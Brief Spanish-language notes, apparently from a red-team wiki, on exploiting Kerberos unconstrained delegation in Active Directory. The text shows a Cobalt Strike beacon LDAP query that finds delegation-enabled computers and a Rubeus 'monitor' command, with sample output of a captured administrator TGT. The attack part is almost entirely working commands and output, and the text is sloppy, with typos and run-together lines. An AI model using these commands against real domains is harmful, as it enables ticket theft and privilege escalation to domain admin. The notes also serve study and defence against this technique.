Unconstrained Delegation
Cómo se Habilita la Unconstrained Delegation?
beacon> ldapsearch (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288)) --attributes samaccountname
sAMAccountName: [SERVIDOR_EJEMPLO_1]$
sAMAccountName: [SERVIDOR_EJEMPLO_2]$Ataqueeee
Explotación con cobalttttt
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /nowrap[*] 19/02/2025 14:56:32 UTC - Found new TGT:
User : [USUARIO_ADMIN]@[DOMINIO.COM]
StartTime : 19/02/2025 14:56:16
EndTime : 20/02/2025 00:56:16
RenewTill : 26/02/2025 14:56:16
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket : doIFj[...snip...]kNPTQ==Última actualización